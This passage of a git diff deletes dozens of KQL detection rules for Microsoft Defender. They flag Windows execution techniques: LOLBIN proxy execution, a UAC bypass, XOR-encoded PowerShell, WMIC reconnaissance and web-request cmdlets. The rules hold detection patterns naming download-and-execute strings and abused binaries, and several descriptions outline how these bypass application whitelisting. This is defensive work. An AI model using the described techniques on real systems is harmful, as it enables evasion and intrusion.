-| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql b/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql
deleted file mode 100644
index 11e20190..00000000
--- a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/06/24
-// Level: medium
-// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
-// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003
-DeviceImageLoadEvents
-| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql b/Execution/Suspicious_WindowsTerminal_Child_Processes.kql
deleted file mode 100644
index 04afff03..00000000
--- a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/25
-// Level: medium
-// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
-// Tags: attack.execution, attack.persistence
-DeviceProcessEvents
-| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_WmiPrvSE_Child_Process.kql b/Execution/Suspicious_WmiPrvSE_Child_Process.kql
deleted file mode 100644
index dbebbd92..00000000
--- a/Execution/Suspicious_WmiPrvSE_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects suspicious and uncommon child processes of WmiPrvSE
-// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql
deleted file mode 100644
index f68123c0..00000000
--- a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
-// Date: 2018/09/05
-// Level: medium
-// Description: Detects presence of a potentially xor encoded powershell command
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/Execution/Suspicious_ZipExec_Execution.kql b/Execution/Suspicious_ZipExec_Execution.kql
deleted file mode 100644
index 59378b3b..00000000
--- a/Execution/Suspicious_ZipExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/07
-// Level: medium
-// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/Execution/Sysprep_on_AppData_Folder.kql b/Execution/Sysprep_on_AppData_Folder.kql
deleted file mode 100644
index 285f542e..00000000
--- a/Execution/Sysprep_on_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/06/22
-// Level: medium
-// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe"
\ No newline at end of file
diff --git a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index e0972b4b..00000000
--- a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ)
-// Date: 2024/02/02
-// Level: medium
-// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
-free space, and other disk information. This can be done using the `wmic` command-line utility and has been
-observed being used by threat actors such as Volt Typhoon.
-
-// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Tasks_Folder_Evasion.kql b/Execution/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Execution/Tasks_Folder_Evasion.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql
deleted file mode 100644
index b28bbd12..00000000
--- a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: Detects uncommon child processes of Appvlp.EXE
-Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
-Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
-or to mark a file as a system file.
-
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index 77dfd04d..00000000
--- a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
deleted file mode 100644
index 43fcebb7..00000000
--- a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql b/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql
deleted file mode 100644
index f63cafcb..00000000
--- a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
-// Tags: attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql b/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql
deleted file mode 100644
index baf4a934..00000000
--- a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/21
-// Level: medium
-// Description: Detects suspicious parent process for cmd.exe
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe")
\ No newline at end of file
diff --git a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql b/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql
deleted file mode 100644
index f826a6aa..00000000
--- a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Net.WebClient" or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest"
\ No newline at end of file
diff --git a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
deleted file mode 100644
index 827d695b..00000000
--- a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/Execution/Use_of_FSharp_Interpreters.kql b/Execution/Use_of_FSharp_Interpreters.kql
deleted file mode 100644
index ca9448e4..00000000
--- a/Execution/Use_of_FSharp_Interpreters.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/02
-// Level: medium
-// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe"
-Both can be used for AWL bypass and to execute F# code via scripts or inline.
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe"))
\ No newline at end of file
diff --git a/Execution/Use_of_OpenConsole.kql b/Execution/Use_of_OpenConsole.kql
deleted file mode 100644
index 319b54f3..00000000
--- a/Execution/Use_of_OpenConsole.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal"))
\ No newline at end of file
diff --git a/Execution/Use_of_Pcalua_For_Execution.kql b/Execution/Use_of_Pcalua_For_Execution.kql
deleted file mode 100644
index 0f9642fe..00000000
--- a/Execution/Use_of_Pcalua_For_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2022/06/14
-// Level: medium
-// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe"
\ No newline at end of file
diff --git a/Execution/Use_of_Scriptrunner.exe.kql b/Execution/Use_of_Scriptrunner.exe.kql
deleted file mode 100644
index 0c832c20..00000000
--- a/Execution/Use_of_Scriptrunner.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql b/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql
deleted file mode 100644
index a0582a37..00000000
--- a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anton Kutepov, oscd.community
-// Date: 2020/02/05
-// Level: high
-// Description: Detects using SettingSyncHost.exe to run hijacked binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1574.008
-DeviceProcessEvents
-| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
diff --git a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql b/Execution/VBA_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index 44e3afbd..00000000
--- a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: high
-// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/VMToolsd_Suspicious_Child_Process.kql b/Execution/VMToolsd_Suspicious_Child_Process.kql
deleted file mode 100644
index fcf64329..00000000
--- a/Execution/VMToolsd_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: bohops, Bhabesh Raj
-// Date: 2021/10/08
-// Level: high
-// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
deleted file mode 100644
index 76373e3d..00000000
--- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
deleted file mode 100644
index 275a6408..00000000
--- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023/04/11
-// Level: medium
-// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/Execution/WMIC_Remote_Command_Execution.kql b/Execution/WMIC_Remote_Command_Execution.kql
deleted file mode 100644
index 11a8cfda..00000000
--- a/Execution/WMIC_Remote_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC to query information on a remote system
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
